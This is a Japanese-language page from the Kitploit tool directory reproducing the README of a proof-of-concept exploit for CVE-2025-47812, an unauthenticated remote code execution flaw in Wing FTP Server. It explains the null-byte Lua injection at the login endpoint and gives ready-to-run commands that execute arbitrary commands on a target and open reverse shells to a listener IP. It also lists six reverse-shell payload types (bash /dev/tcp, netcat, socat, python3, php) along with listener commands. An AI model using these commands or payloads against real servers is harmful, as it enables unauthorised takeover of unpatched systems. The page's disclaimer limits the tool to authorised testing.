Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-47812-PoC | Kitploit
ツール/GitHubGitHub/havbay/cve-2025-47812-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングリモートアクセスツール
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-47812 — Wing FTP Server リモートコード実行 (RCE)

Python CVSS Type

概要

フィールド値
CVECVE-2025-47812
影響を受けるバージョンWing FTP Server < 7.4.4
タイプ認証不要のリモートコード実行
CVSS スコア10.0 (緊急)
修正バージョンWing FTP Server 7.4.4

仕組み

脆弱性は /loginok.html ログインエンドポイントに存在します。サーバーは username フィールド内の null バイト (%00) を適切にサニタイズしません。これにより、攻撃者はセッションファイルに任意の Lua コード を注入でき、そのコードは後で /dir.html などのエンドポイントにアクセスした際にサーバーサイドで評価されます — 認証は一切不要です。

参考: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


機能

  • 認証不要のコマンド実行
  • 複数のリバースシェルペイロード (socat, bash, python3, nc-e, nc-fifo, php)
  • 完全なインタラクティブ TTY のために Socat ペイロードを優先
  • 事前のターゲット到達可能性チェック
  • 試行ごとに新しいセッションを使用した自動セッション UID 抽出
  • --payload フラグで特定のペイロードを選択
  • -o でコマンド出力をファイルに保存
  • 設定可能な --timeout および --delay
  • -v で詳細/デバッグモード
  • Ctrl+C の適切なハンドリング
  • リバースシェル試行後のペイロードサマリー
  • CLI 引数モード + インタラクティブメニュー
  • 色分けされた出力

必要条件

root@kitploit:~
pip install requests

使用方法

インタラクティブモード

root@kitploit:~
python3 wingftp_rce_exploit.py

CLI モード

root@kitploit:~
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

全てのオプション

root@kitploit:~
-u / --url        ターゲットのベース URL
-U / --username   ログインユーザー名 (デフォルト: anonymous)
-c / --command    実行するコマンド (コマンドモード)
-r / --rhost      あなたのリスナー IP (リバースシェルモード)
-p / --rport      あなたのリスナーポート (リバースシェルモード)
     --payload    使用する特定のペイロード (以下のリストを参照)
     --timeout    HTTP リクエストタイムアウト (秒) (デフォルト: 10)
     --delay      ペイロード試行間の遅延 (秒) (デフォルト: 4)
-o / --output     コマンド出力をファイルに保存
-v / --verbose    デバッグ出力を有効化

リバースシェルペイロード


使用例

コマンド実行

root@kitploit:~
Target URL : http://192.168.1.10:5466
Username   : anonymous
選択     : 1
Command    : whoami

リバースシェル

ステップ 1 — リスナーを起動 (完全な TTY には socat 推奨):

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

または nc の場合:

root@kitploit:~
nc -lvnp 4444

ステップ 2 — エクスプロイトを実行:

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

クレジット

  • 元の PoC 作成者: blindma1den
  • 改良・拡張: Havbuy

免責事項

このツールは教育目的および許可されたセキュリティテストのみを対象としています。
自分が所有していない、または明示的な書面による許可を得ていないシステムに対しては使用しないでください。
不正使用は違法です。作者は誤用に対する一切の責任を負いません。

ツールをダウンロード
名前方法
socatsocat 経由の完全 PTY
bash/dev/tcp リダイレクト
python3ソケットサブプロセス
nc-e-e フラグ付きの Netcat
nc-fifoNetcat + mkfifo
phpPHP fsockopen